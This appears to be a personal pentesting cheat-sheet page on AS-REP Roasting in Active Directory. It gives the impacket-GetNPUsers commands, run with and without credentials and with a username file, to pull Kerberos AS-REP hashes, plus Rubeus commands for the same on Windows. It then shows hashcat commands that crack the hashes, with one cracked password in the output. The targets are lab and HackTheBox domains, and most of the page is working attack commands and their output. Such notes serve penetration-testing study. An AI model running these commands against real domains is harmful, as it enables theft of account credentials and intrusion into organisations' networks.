AS-REP Roasting
Recap
The first step of authentication in Kerberos is to send an AS-REQ to the domain controller. If the authentication is successful, a AS-REP is sent to the AD user containing the session key and Ticket Granting Ticket (TGT). This is called Kerberos Pre-authentication.
AS-REP Roasting
A user is vulnerable to AS-REP Roasting if Kerberos Pre-authentication is disabled.
AS-REP Roasting is when an attacker sends a AS-REQ on behalf of another user after acquiring a AS-REP from the server. The attacker can use an offline password against the encrypted response.
Attacking with Impacket-GetNPUsers
kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
Name MemberOf PasswordLastSet LastLogon UAC
---- -------- -------------------------- -------------------------- --------
dave 2022-09-02 19:21:17.285464 2022-09-07 12:45:15.559299 0x410200 The output shows that dave has kerberos pre-authentication set to disabled. He's vulnerable to AS-Roasting!
Cracking with Hashcat
kali@kali:~$ sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
[email protected]:b24a619cfa585dc1894fd6924162b099$1be2e632a9446d1447b5ea80b739075ad214a578f03773a7908f33...751a876a756757dc22:Flowers1AS-REP Roasting without credentials
If we have a user list but no credentials we can look for users that don't require Kerberos pre-authentication "AS-REP Roasting"
kali@kali:~$ impacket-GetNPUsers -dc-ip htb.local -request 'htb.local/'
Impacket v0.11.0 - Copyright 2023 Fortra
Name MemberOf PasswordLastSet LastLogon UAC
------------ ------------------------------------------------------ -------------------------- -------------------------- --------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2024-02-07 22:18:28.185616 2024-02-07 09:14:25.279474 0x410200
[email protected]:20a92d6ea68903d4bb8aa15dc9592fdf$98ce719d2b34cee82612532f8b7bb1858466e7a001b307bbfde16fa469dd86f6843c8b4b79ead213c27df71639156513bd41f39d236f3cde4158a9da513c886f893ce39fa3ceadb528417d02ef50b91d5df0e2eec926a42cc19108783b45f582ea59d86fd2111e83ea4d54ebb59b4ad5eb78e02213ba44488e74ce73c3f8fa8775bc780f0822400662cb08e1f0d59b815a65d4eec9abc6e9211bdfd9e963d849970791873dd108e802b16c8f6686393ac8a9c1bcbc9d509542188da56fdb7066f025ce0200e397607448672a66eb2f08642a5b57a951e277337560387e2878400f4c6e4f49dc
AS-REP Roasting with Username files
If we have a usernames.txt file we can add it.
kali@kali$ impacket-GetNPUsers -usersfile usernames.txt -request -format hashcat -outputfile ASREPRoastable.txt -dc-ip intelligence.htb 'intelligence.htb/'
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User William.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Scott.Scott doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jason.Wright doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Veronica.Patel doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jennifer.Thomas doesn't have UF_DONT_REQUIRE_PREAUTH set
AS-REP Roasting on Windows
If we have a shell, it's easy to utilize Rubeus to perform AS-REP Roasting on Windows.
PS C:\Users\jeff> cd C:\Tools
PS C:\Tools> .\Rubeus.exe asreproast /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: AS-REP roasting
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
[*] SamAccountName : dave
[*] DistinguishedName : CN=dave,CN=Users,DC=corp,DC=com
[*] Using domain controller: DC1.corp.com (192.168.50.70)
[*] Building AS-REQ (w/o preauth) for: 'corp.com\dave'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
[email protected]:AE43CA9011..AGD91Cracking with Hashcat
We can then Ex-filtrate the hash and crack with hashcat.
kali@kali:~$ sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
[email protected]:b24a619cfa585dc1894fd6924162b099$1be2e632a9446d1447b5ea80b739075ad214a578f03773a7908f33...751a876a756757dc22:Flowers1Last updated